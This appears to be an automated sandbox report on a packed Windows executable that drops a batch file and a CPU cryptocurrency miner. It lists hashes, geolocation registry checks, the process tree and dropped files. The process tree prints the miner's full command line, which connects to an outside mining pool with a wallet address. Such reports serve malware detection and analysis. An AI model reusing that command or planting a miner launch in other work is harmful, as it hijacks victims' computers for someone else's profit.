73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
293s
max time network
296s
platform
windows10-2004_x64
resource
win10v2004-20240221-ja
resource tags

arch:x64arch:x86image:win10v2004-20240221-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
24/02/2024, 03:39

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2132103209-3755304320-2959162027-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2132103209-3755304320-2959162027-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
4020	b2e.exe
5104	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
5104	cpuminer-sse2.exe
5104	cpuminer-sse2.exe
5104	cpuminer-sse2.exe
5104	cpuminer-sse2.exe
5104	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/2352-9-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 2352 wrote to memory of 4020	2352	batexe.exe	89
PID 2352 wrote to memory of 4020	2352	batexe.exe	89
PID 2352 wrote to memory of 4020	2352	batexe.exe	89
PID 4020 wrote to memory of 2752	4020	b2e.exe	91
PID 4020 wrote to memory of 2752	4020	b2e.exe	91
PID 4020 wrote to memory of 2752	4020	b2e.exe	91
PID 2752 wrote to memory of 5104	2752	cmd.exe	93
PID 2752 wrote to memory of 5104	2752	cmd.exe	93

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2352
- C:\Users\Admin\AppData\Local\Temp\638C.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\638C.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\638C.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4020
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\664B.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2752
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:5104

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\638C.tmp\b2e.exe

Filesize
400KB

MD5
daf86de107a748237f75cfd476aacdc5

SHA1
ae3934ec4d4d2cd18e378e01eeb93b2bc8378f54

SHA256
3764b008f63b280e16fdd35dd547621e844b84d8d039655b482972b61de8bd70

SHA512
03c6bcdc3fafb6f55975def214e8e9dc59a1937d884c4913b5988a0f3b87da336257b5db569b902dd93d6097bf7558edb7c34d849efe1dec772dcb8c959f93e6

Download Submit
C:\Users\Admin\AppData\Local\Temp\638C.tmp\b2e.exe

Filesize
279KB

MD5
a02abef941e69accc321495729a90bf0

SHA1
192e0a1ab63659b6fd93943b95768a3b2d9c3aed

SHA256
b65cc1d4204cc2045e5d89932392547a89824b30a377eac1ac17c21035d1bda5

SHA512
c4379279249d724bce20c6d163f0950e4999277f8612c8dc310a1d1ca08767ef8673fd73bc125ca1db35609d800f07613d2d9bcc483221c19080b1986fab751e

Download Submit
C:\Users\Admin\AppData\Local\Temp\638C.tmp\b2e.exe

Filesize
128KB

MD5
666f3abc4166016f86356a90d5f63bad

SHA1
bf3c030469bab8c31a6f15c7067e5911c35d50ee

SHA256
07cab0a34d074dfc78f349e37277802f876a83e4cf6c074155494762a9bc9e0e

SHA512
617ff5ab9cabfb5d21a43a8a36d4383db1c3f6be410a25915960e9868610355d1b92040728e66c45e88325da4555d8bf2b71c522dd9a7af88d0054fdd4a26d80

Download Submit
C:\Users\Admin\AppData\Local\Temp\664B.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
226KB

MD5
3ffa4cccbdf276baebfcdde5898ed84e

SHA1
f4d64fd853eb8ee2586e3c712a312308ca955ac9

SHA256
3b42ef483fcdeb06a7e00e75af68fd6ec43ab5cc477b20797822484016c98914

SHA512
2dda7a4d5af9d57d353d1c09ead0d5112285923d7077f43fb5d28a484ccdfa83196c921fe895dd3c43fe3111157a2641328e7b90da28c4f58aa1ea5a2d966a1d

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
366KB

MD5
1bfa0a070ae9d8fd284c0804dd93b120

SHA1
ddfda320667d6d3c6b44de0fdccebe6f7dfd5601

SHA256
53c477535b374a7a009c515e3089431da5cb85cf4bdb346a79703cd8d05a73c6

SHA512
5b5e64c1e62097e52aa3572fe519ee39ddb164c281b95617c247389d1cf8804c7c88444f9b44b16e5069452d094c15d549d850e34aa034769cf1f50f2f34cd8f

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
132KB

MD5
826865b433920c8a6302ccf8fda6699e

SHA1
1e40df8aa2471c7b035a751174316358f2b439f3

SHA256
3cc0ab0c1344bf8330c49d89c3291f6fafb83e9b0aa1629aa2321558d0be8481

SHA512
c88962d06560899f86a9cdd908d49986efd000d93ca17bfec7939782c3e04b3fc30470d606a37ae112ab6eb7cf0b1589d005c740e7ad9e06f3814a516747afcb

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
190KB

MD5
cf083c70f035fc1f906389b246719424

SHA1
855c0efef0257a3e799d84b936f3101fa80284fd

SHA256
3143a414b433fbd08a80ad9641ffb334ab4414c95ed5925482e7207cb688fa66

SHA512
4c6ddd2459d078faa29c9f2a74a6cb85090a3bdf0d0b62cb7f49f5c03c33a685182589fb5f0d55a1271935a841015852282df6a8b38fcde7e2c070d63462f554

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
168KB

MD5
417ed8bf990f1f40fd5e762b6de09092

SHA1
573a5b5bc3e71603b3c7f416d0443beff2c81381

SHA256
2837bc2155fc7d71ea0d652b037cbfb9eedee337be0842e934e02fad3a7f1cc2

SHA512
a05815d96c7af9b25f5073cdc6edb2465876d2d356c780710c3befe28c44bccb9ed7045201f2b4581f77633159f37af0122dd691bec4a2c0bb7d2d817131dc51

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
270KB

MD5
2e46eee751ea424a559f3f1b4258b45e

SHA1
213179e75225f02026504a977f9711d70c07dd87

SHA256
02d1069a7f4534d45d14b80459952ea6d71e3d9e5065dcc4b83c2f3d0c5dd33b

SHA512
13e1236fc1445ccaab2d78f5caff66bd51944b223feea16d65faf7a988aca75afe51b6e0f21e83ff1bdbe456ea4c2980671953527e76ee1371039dfdca91a1b6

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
155KB

MD5
2c47b042d7b01710eef424bb029b7691

SHA1
548940ab39538ed99c1ac4387b7e9df52ca41b9b

SHA256
99a1ed9c33d204ab96876128ee7d3e2612d9ae13ce9d225ae5616f016d66b50b

SHA512
789a3d4bf3d6228b475d5c307fc564b9349638e958aaa0cd961f4a02e54a0b78ac962067ddadfcee84b7b3dd48344281c4c91fa03e0e4747aedbd09054eea1d0

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
119KB

MD5
88fbaa8f98c7dae79963cae5e5db9b4f

SHA1
9961bc4df5e3bc6ac7435b6a31368b636036b827

SHA256
ad1a61885e8df078db904742c292cb1d984043fcf9ae6d39d371b4b2617cc97c

SHA512
1674e9f2e5981bc65e45980c7f5327d0da200aa0327344f23045e10a5fcefb001e6823c88e168aefb874b291ed95414abc181738f86644ba9281535d6b23d2ac

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
226KB

MD5
599ba51b6f5fb5d0d311e5ca7d357852

SHA1
48e07ea9a67714d6e9d46755fa2bd0dea24c83d4

SHA256
d5ad7bc7edc50da3ca1caf1b4191476a4b581f63a85d5cb274dff8a48bd18e36

SHA512
20d544b4ee58004d8a78e9b305b22058042a08a4145a31c50acbb83105c37139c34cbdf5804bb4462d6803111b8d2efee62cc23c3ca44b72212064ce1d2764ce

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
143KB

MD5
11abae07074bc99e87564b0916ba3dd1

SHA1
8c52a601542188944b9e8f883718ab4aa4fae056

SHA256
01969479097110fd00544b2f272664ed242074b89ce5ce882bfebeabc048bddc

SHA512
11e3dbfddd48dcba50cebdbb36380306afa70472262179fdd11037f602288358d40ff02db1d8d79368daa18caad2564617df5074e9173632a2e2f92e962058cb

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
209KB

MD5
78e5cd220f6b075da9effffdded63b30

SHA1
2e46a486a36f0585163d5aaf4c8eca570587e4b1

SHA256
d77a9f0eaae50dfb5ad027bec517dc3a0183fc539b4378563adac90bcd2294ae

SHA512
85cb2542751b7dcd99207bcac351a1ac095a8145338203609e13aa460737afc8dc8de9e8b3b8b2414de661b364ccef46869cfe5a64394b829900cd4d0db563ee

Download Submit
memory/2352-9-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/4020-7-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4020-53-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/5104-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5104-64-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5104-45-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/5104-47-0x0000000001150000-0x0000000002A05000-memory.dmp

Filesize
24.7MB

Download
memory/5104-46-0x0000000060AE0000-0x0000000060B78000-memory.dmp

Filesize
608KB

Download
memory/5104-54-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5104-59-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5104-44-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/5104-69-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5104-74-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5104-84-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5104-94-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5104-99-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5104-104-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download